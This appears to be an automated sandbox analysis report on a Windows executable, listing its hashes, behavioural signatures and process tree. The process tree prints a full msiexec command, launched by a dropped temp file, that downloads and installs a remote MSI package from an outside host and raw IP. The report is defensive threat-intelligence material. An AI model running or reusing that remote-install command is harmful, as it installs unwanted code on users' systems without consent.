Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
25/08/2024, 07:04
Static task
static1
Behavioral task
behavioral1
Sample
ecb85d95c4aca1202e34c2b125a2c250N.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ecb85d95c4aca1202e34c2b125a2c250N.exe
Resource
win10v2004-20240802-en
General
-
Target
ecb85d95c4aca1202e34c2b125a2c250N.exe
-
Size
1.4MB
-
MD5
ecb85d95c4aca1202e34c2b125a2c250
-
SHA1
7ab9fe65804ab65b141b61d5d78d1cd51863a5f3
-
SHA256
65ec76bf52dbdb94fa4fb5d83b6445f910c33a5288f618e7d91385be660f17eb
-
SHA512
0231e6cd4edba9658d7ec17f69dfc859898af4e86107fca1add797ad97861cc908f2589cfcc6946f6c0da0095dbc2606292a2ba1a395e2541878c2f905365df9
-
SSDEEP
24576:SaQv0pic0lIpgYtQsCeya+QuVBY/H/wUUG/y324CDDlUNbaIWMi:Sa1peIVQsTCYf4LGvvDRUgHMi
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1444 ~pcicvvgipa.tmp -
Loads dropped DLL 1 IoCs
pid Process 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2756 MSIEXEC.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ecb85d95c4aca1202e34c2b125a2c250N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ~pcicvvgipa.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSIEXEC.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeShutdownPrivilege 2756 MSIEXEC.EXE Token: SeIncreaseQuotaPrivilege 2756 MSIEXEC.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2756 MSIEXEC.EXE 2756 MSIEXEC.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1928 wrote to memory of 1444 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe 30 PID 1928 wrote to memory of 1444 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe 30 PID 1928 wrote to memory of 1444 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe 30 PID 1928 wrote to memory of 1444 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe 30 PID 1928 wrote to memory of 1444 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe 30 PID 1928 wrote to memory of 1444 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe 30 PID 1928 wrote to memory of 1444 1928 ecb85d95c4aca1202e34c2b125a2c250N.exe 30 PID 1444 wrote to memory of 2756 1444 ~pcicvvgipa.tmp 31 PID 1444 wrote to memory of 2756 1444 ~pcicvvgipa.tmp 31 PID 1444 wrote to memory of 2756 1444 ~pcicvvgipa.tmp 31 PID 1444 wrote to memory of 2756 1444 ~pcicvvgipa.tmp 31 PID 1444 wrote to memory of 2756 1444 ~pcicvvgipa.tmp 31 PID 1444 wrote to memory of 2756 1444 ~pcicvvgipa.tmp 31 PID 1444 wrote to memory of 2756 1444 ~pcicvvgipa.tmp 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe"C:\Users\Admin\AppData\Local\Temp\ecb85d95c4aca1202e34c2b125a2c250N.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp"C:\Users\Admin\AppData\Local\Temp\~pcicvvgipa.tmp"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\MSIEXEC.EXEMSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/client/pkgs/allstar/All Star Slots20160209125305.msi" DDC_DID=1454323 DDC_RTGURL=http://www.cdnfile.eu/dl/TrackSetup/TrackSetup.aspx?DID=1454323 DDC_UPDATESTATUSURL=http://190.4.94.65:8080/allstar/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://190.4.94.65:8080/allstar/Lobby.WebSite/SignUpUnsecure.aspx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~pcicvvgipa.tmp"3⤵
- Use of msiexec (install) with remote resource
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2756
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57517b9e0ebd0104cc79ba81384274cdb
SHA1c5427d7b52d533deabb4902641eeb6e2bf2c865e
SHA256038bf4e17f9344d1eaa5d2de9a41fa4ebd771efeaf0779765fa428b8105b9c93
SHA512a51b53e72ad13baa1f1cfd845af8fde96f4afec4065119c2a597313c1dc8c67043c8375ca54601035d22d84b50cc73f9d884cd85180cdeaa2f21805c1bee20d0
-
Filesize
21KB
MD5be345d0260ae12c5f2f337b17e07c217
SHA10976ba0982fe34f1c35a0974f6178e15c238ed7b
SHA256e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3
SHA51277040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff
-
Filesize
20B
MD5db9af7503f195df96593ac42d5519075
SHA11b487531bad10f77750b8a50aca48593379e5f56
SHA2560a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13
SHA5126839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b
-
Filesize
5KB
MD5b988e8eaf0e2b9e295ba59d624190f34
SHA13e74acee428150c0bf1d0444a3a2dc5fc22a6307
SHA2564c77c6717782314118d016fd6cba0d355cc64bbcf5a0d7aaf7284e5591d660a8
SHA5125236d29a8cd49fb59a786af0b9b2151a639d9e3675fe1ae9ac6ba17660340bca905ff2e37667a1db02092a35175b1e5423e4deebfcbc46ed61458dbf9c339c87
-
Filesize
1.2MB
MD5b805b8500a08be1317384b954ae0acff
SHA1091521daaf9d208b4fad59d1bec273779cebbae8
SHA256f03dcb8a1c3099081cb9fec98369c4c55840b0ecae421b670c5b5cdaf64f0bea
SHA512b543f30ec61f2d1d6a9400af585576cdb69709eec9b51c14534fc89382fde945b9d0353393a66afc29f935a87ea4523bc044a7a51e1895253398eba676d5bad7